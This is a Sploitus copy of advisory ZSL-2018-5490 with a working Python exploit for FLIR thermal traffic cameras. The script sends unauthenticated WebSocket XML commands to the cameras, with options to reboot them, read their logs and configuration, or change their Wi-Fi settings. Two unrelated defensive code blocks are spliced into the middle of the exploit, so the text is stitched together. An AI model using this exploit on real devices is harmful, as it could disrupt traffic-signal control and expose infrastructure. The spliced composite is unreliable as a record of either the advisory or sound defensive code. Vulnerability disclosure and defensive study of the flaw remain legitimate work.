## https://sploitus.com/exploit?id=ZSL-2018-5490
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
#
# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
#                            E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
#                            V1.02.P01     (TI x-stream)  Codename: TIIP2
#                            V1.05.P01     (ThermiCam)    Codename: ThermiCam
#                            V1.04.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.04         (ThermiCam)    Codename: ThermiCam
#                            V1.01.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.05.P03     (TrafiSense)   Codename: TrafiSense
#                            V1.06         (VIP-IP)       Codename: VIP-IP
#                            V1.02.P02     (TrafiRadar)   Codename: TrafiRadar
#
# Vendor patched firmware version:
#
# Product name                Firmware      Released 
# ----------------------------------------------------
# ThermiCam / TrafiSense      E1.06.03      17.09.2018
# TI BPL2 EDGE                V1.00         17.09.2018
# TI x-stream                 E1.03.02      17.09.2018
# TrafiOne                    E1.02.02      17.09.2018
# ----------------------------------------------------
#
# Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
# and dynamic traffic signal control. Offered in a compact and affordable
# package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
# adapt traffic signals based on the presence detection of vehicles, bicycles
# and pedestrians while at the same time generating high resolution data at
# intersections and in urban environments. FLIR TrafiOne helps traffic engineers
# to improve traffic flows, reduce vehicle idling time, monitor congestion,
# enhance safety for vulnerable road users, collect data and measure travel and
# delay times for different transport modes.
#
# FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
# video detector in a single unit. FLIR TrafiCam detects moving and stationary
# vehicles at signalized intersections. Via detection outputs or via IP protocol,
# vehicle presence information is transmitted to the traffic controller so that
# signal timing can be adjusted dynamically. This way, vehicle waiting time at
# traffic lights is reduced and traffic flows are optimized.
#
# FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
# detection. TrafiSense does not need light to operate, but uses the thermal energy
# emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
# and bikes in the darkest of nights, over a long range and in the most difficult
# weather conditions. The result is reliable, 24/7 traffic detection for a wide
# range of applications.
#
# FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
# radar. TrafiRadar is typically used for stop bar and advance vehicle presence
# detection, traffic adaptive systems, and dilemma-zone protection and thus improves
# traffic safety and efficiency at signalized intersections. TrafiRadar will warn
# traffic light controllers whenever a vehicle is present in the dilemma zone, either
# extending green or red lights to improve overall safety.
#
# FLIR TrafiCam x-stream detects moving and stationary vehicles at signalized
# intersections and collects traffic data at intersections or on interurban roads.
# Via detection outputs or via IP protocol, vehicle presence information is
# transmitted to the traffic controller so that signal timing can be adjusted
# dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
# used for traffic monitoring in a control room.
#
# The VIP series offers multi-functional Video Image Processing modules for traffic
# control. VIP boards integrate automatic incident detection, data collection,
# recording of pre and post incident image sequences and streaming video in one
# board. VIP modules have been installed for road and tunnel projects all over the
# world.
#
# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability in their websocket protocol handling. The affected FLIR Intelligent
# Transportation Systems (ITS) models use an insecure implementation of the websocket
# communication used for administering the device. Authentication and authorization
# bypass via direct object reference allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with the Reboot command. The devices do not support TLS (the 'wss://' prefix) for
# WebSocket Secure connections, so the network traffic is disclosed in plain text to
# MitM evil-doers. Also, the web service does not properly validate the Origin header
# and is therefore vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
#
# ---
# Request:
#
# GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
# Host: 192.168.1.1:13042
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin: zeroscience.mk:1337
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
#
# Response:
#
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
#
# ---
# No HTTP/1.1 401 Unauthorized response observed.
#
# Tested on: nginx/1.12.1
#            nginx/1.10.2
#            nginx/1.8.0
#            Websocket/13 (RFC 6455)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2018-5490
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
#
# Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
# Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf
#
#
# 26.07.2018
#
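The handshake captured above is answered with 101 Switching Protocols although the Origin is a foreign host and the only cookie is a locale preference. As an added example (not part of the advisory and not FLIR's firmware code), the following is the server-side gate that such an upgrade request should pass through: an Origin allowlist (the CSWSH fix), a session check that answers 401 instead of upgrading, and the RFC 6455 Sec-WebSocket-Accept computation. The session table, the cookie name `session` and the allowlisted UI origin `http://192.168.1.1` are constructed assumptions; the request dict is the capture above transcribed.

```python
import base64
import hashlib

# RFC 6455, section 4.2.2: GUID appended to the client key before hashing.
WS_MAGIC_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def websocket_accept(sec_websocket_key):
    """Return the Sec-WebSocket-Accept value for a client's Sec-WebSocket-Key."""
    digest = hashlib.sha1((sec_websocket_key + WS_MAGIC_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def parse_cookies(cookie_header):
    """Split a Cookie header into a dict (no quoting support; enough for a demo)."""
    cookies = {}
    for part in cookie_header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def check_upgrade(headers, allowed_origins, session_lookup):
    """Decide the outcome of a WebSocket upgrade request.

    headers         -- request headers as a dict with lower-cased names
    allowed_origins -- set of "scheme://host[:port]" values the device's own UI is served from
    session_lookup  -- callable(session_id) -> session dict, or None if unknown

    Returns (status, extra_headers); 101 means the upgrade is accepted.
    """
    if headers.get("upgrade", "").lower() != "websocket":
        return 400, {}
    key = headers.get("sec-websocket-key")
    if not key:
        return 400, {}
    # Origin allowlist: a browser-driven cross-site request (CSWSH) carries the
    # attacking page's Origin, so anything not on the list is refused outright.
    if headers.get("origin") not in allowed_origins:
        return 403, {}
    # Authentication: the session cookie must resolve to a live session. The
    # captured request only carries a locale cookie, so it stops here.
    session_id = parse_cookies(headers.get("cookie", "")).get("session")
    session = session_lookup(session_id) if session_id else None
    if session is None:
        return 401, {}
    return 101, {"Sec-WebSocket-Accept": websocket_accept(key)}


# The upgrade request captured in the advisory above, as a header dict.
OBSERVED_REQUEST = {
    "host": "192.168.1.1:13042",
    "connection": "Upgrade",
    "upgrade": "websocket",
    "origin": "zeroscience.mk:1337",
    "sec-websocket-version": "13",
    "cookie": "tmhDynamicLocale.locale=%22en%22",
    "sec-websocket-key": "A5SH9PRtc3rYF49kKO4vmw==",
}

# Constructed stand-ins for the device's own session store and UI origin.
SESSIONS = {"c0ffee": {"role": "admin"}}
ALLOWED_ORIGINS = {"http://192.168.1.1"}


def demo():
    """Run the gate over the captured request and two corrected variants."""
    lookup = SESSIONS.get
    as_captured = check_upgrade(OBSERVED_REQUEST, ALLOWED_ORIGINS, lookup)
    same_origin = dict(OBSERVED_REQUEST, origin="http://192.168.1.1")
    no_session = check_upgrade(same_origin, ALLOWED_ORIGINS, lookup)
    logged_in = dict(same_origin, cookie="session=c0ffee; tmhDynamicLocale.locale=%22en%22")
    accepted = check_upgrade(logged_in, ALLOWED_ORIGINS, lookup)
    return as_captured[0], no_session[0], accepted[0]


if __name__ == "__main__":
    print(demo())  # (403, 401, 101)
```

The order of the checks matters: the Origin test runs before any session lookup so that a cross-site page never learns whether the victim's browser holds a valid session, and the 401 comes from the HTTP handshake rather than from a frame sent after the upgrade, which is the point at which the affected firmware no longer checks anything.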

from websocket import create_connection as t00t  # pip package: websocket-client
import time
import sys

endpoint = "/ws/xml2"

if len(sys.argv) <= 2:
    print('[*] Usage: exploit.py <ipaddress> <port>')
    sys.exit(0)

host = sys.argv[1]
port = sys.argv[2]

# Supported message types:
'''
<message type="SupportedMessages">
<message type="GetMessageConstraints"></message>
<message type="GetSupportedMessages"></message>
<message type="Session"></message>
<message type="Subscription"></message>
<message type="ClearData"></message>
<message type="GetConnectionInformation"></message>
<message type="GetData"></message>
<message type="GetEvents"></message>
<message type="GetLostData"></message>
<message type="GetManagedBy"></message>
<message type="GetPresenceData"></message>
<message type="GetPresenceLevel"></message>
<message type="GetPresenceLevelHistory"></message>
<message type="GetStorageLimits"></message>
<message type="SetConnectionSettings"></message>
<message type="SetManagedBy"></message>
<message type="ClearBootCount"></message>
<message type="ClearHistogram"></message>
<message type="ClearStoredCounter"></message>
<message type="ClearSystemLogs"></message>
<message type="CreateAviSequence"></message>
<message type="DoBadStuff"></message> <-- ;]]
<message type="ForceEvent"></message>
<message type="ForceKeyframe"></message>
<message type="GetBootCount"></message>
<message type="GetBplSettings"></message>
<message type="GetCameraConfiguration"></message>
<message type="GetCameraDefinitions"></message>
<message type="GetCameraSettings"></message>
<message type="GetConfiguration"></message>
<message type="GetConstraints"></message>
<message type="GetCpuStatistics"></message>
<message type="GetDateTime"></message>
<message type="GetDisplayOverlay"></message>
<message type="GetEventLog"></message>
<message type="GetEventsDescription"></message>
<message type="GetFrameFlow"></message>
<message type="GetHardwareInformation"></message>
<message type="GetHardwareSensors"></message>
<message type="GetHistogram"></message>
<message type="GetImage"></message>
<message type="GetImageSharpness"></message>
<message type="GetLeptonSettings"></message>
<message type="GetLoggingActivation"></message>
<message type="GetMemoryStatistics"></message>
<message type="GetNumberOfOutputs"></message>
<message type="GetOpenEvents"></message>
<message type="GetOutputsState"></message>
<message type="GetPermissions"></message>
<message type="GetProductInformation"></message>
<message type="GetSocketInformation"></message>
<message type="GetState"></message>
<message type="GetStoredCounter"></message>
<message type="GetSystemLogs"></message>
<message type="GetTemperature"></message>
<message type="GetThermalQualityHistogram"></message>
<message type="GetThermalQualityReferenceImage"></message>
<message type="GetThreadInformation"></message>
<message type="GetTime"></message>
<message type="GetTranslations"></message>
<message type="GetUpTime"></message>
<message type="GetVersion"></message>
<message type="GetVoltage"></message>
<message type="GetWifiInformation"></message>
<message type="KeepAlive"></message>
<message type="Notify"></message>
<message type="PauseDetectionFramework"></message>
<message type="Reboot"></message>
<message type="SetBplSettings"></message>
<message type="SetCameraConfiguration"></message>
<message type="SetCameraSettings"></message>
<message type="SetConfiguration"></message>
<message type="SetConstraintsFilter"></message>
<message type="SetDateTime"></message>
<message type="SetDisplayOverlay"></message>
<message type="SetHardwareInformation"></message>
<message type="SetLeptonSettings"></message>
<message type="SetLoggingActivation"></message>
<message type="SetTime"></message>
<message type="SetWifiInformation"></message>
<message type="UpdateFrameFlow"></message>
</message>
'''
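Every type in the list above, including Reboot and the Set* family, is accepted on the bare socket once the handshake is through. As an added example (not part of the exploit and not FLIR's code), this is the per-message authorization gate that the message dispatcher should apply: parse the frame with a size cap, resolve the session bound to the socket, and allow a type only if it is on an explicit list for that role, refusing everything else and recording the refusal for monitoring. The two-tier split of the message types and the `viewer`/`admin` roles are constructed assumptions, not FLIR's permission model; the frames are constructed in the format the exploit sends.

```python
import xml.etree.ElementTree as ET

# Constructed split of the supported-message list: read-only types are
# viewer-level, types that change configuration or availability are admin-only,
# and any type not listed here is refused (default deny).
VIEWER_MESSAGES = {
    "GetProductInformation", "GetVersion", "GetUpTime", "GetState",
    "GetTemperature", "GetSupportedMessages", "KeepAlive",
}
ADMIN_MESSAGES = {
    "Reboot", "SetWifiInformation", "SetConfiguration", "SetCameraSettings",
    "SetDateTime", "ClearSystemLogs", "ClearData", "PauseDetectionFramework",
    "GetSystemLogs", "GetConfiguration",
}
MAX_FRAME_BYTES = 4096  # cap before parsing: the XML arrives from an untrusted socket


def parse_message_type(frame):
    """Return the type attribute of a <message> frame, or None if it is not well-formed."""
    if len(frame) > MAX_FRAME_BYTES:
        return None
    try:
        # Stdlib parser to keep the example dependency-free; for production code
        # the defusedxml package is the safer choice against entity-expansion input.
        root = ET.fromstring(frame)
    except ET.ParseError:
        return None
    if root.tag != "message":
        return None
    return root.get("type")


def authorize(session, frame, audit):
    """Decide whether a received frame may be dispatched.

    session -- None for an unauthenticated socket, else a dict with a 'role'
               of 'viewer' or 'admin' (constructed roles)
    frame   -- the XML text received on the socket
    audit   -- list that collects refused attempts as (reason, type, role)

    Returns "allow" or "deny".
    """
    mtype = parse_message_type(frame)
    role = session.get("role") if session else None
    if mtype is None:
        audit.append(("malformed", None, role))
        return "deny"
    if session is None:
        audit.append(("unauthenticated", mtype, None))
        return "deny"
    if mtype in VIEWER_MESSAGES and role in ("viewer", "admin"):
        return "allow"
    if mtype in ADMIN_MESSAGES and role == "admin":
        return "allow"
    audit.append(("forbidden", mtype, role))
    return "deny"


# Constructed frames modelled on the exploit's own message format.
FRAMES = [
    (None, '<message type="GetProductInformation"></message>'),
    (None, '<message type="Reboot"></message>'),
    ({"role": "viewer"}, '<message type="GetProductInformation"></message>'),
    ({"role": "viewer"}, '<message type="SetWifiInformation"></message>'),
    ({"role": "admin"}, '<message type="Reboot"></message>'),
    ({"role": "admin"}, '<message type="DoBadStuff"></message>'),
    ({"role": "admin"}, '<message type="Reboot">'),
]


def run_demo():
    """Return the decisions for FRAMES and the audit trail of refusals."""
    audit = []
    decisions = [authorize(session, frame, audit) for session, frame in FRAMES]
    return decisions, audit


if __name__ == "__main__":
    decisions, audit = run_demo()
    for (session, frame), decision in zip(FRAMES, decisions):
        print(decision, session, frame)
    print(audit)
```

The audit list is what a defender would forward to a log collector: a burst of `unauthenticated` entries naming Reboot or Set* types on the administration port is exactly the signal the affected firmware never produces, because it neither refuses nor records such frames.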

# Plain ws:// only: the affected firmware offers no wss:// endpoint.
socket = t00t("ws://" + host + ":" + port + endpoint)

#print('Sending Reboot message type (DoS)...')
#msg = '<message type="Reboot"></message>'
#print('Getting supported messages...')
#msg = '<message type="GetSupportedMessages"></message>'
#print('Getting system logs...')
#msg = '<message type="GetSystemLogs"></message>'
#print('Getting device configuration...')
#msg = '<message type="GetConfiguration"></message>'
#print('Setting new Wifi information...')
#msg = '''
#<message type="SetWifiInformation">
#    </message>
#
#'''

msg = '<message type="GetProductInformation"></message>'

socket.send(msg)
print('Message sent.')
print('Receiving...')
time.sleep(2)
priem = socket.recv()
print('Received data: \n%s' % priem)
socket.close()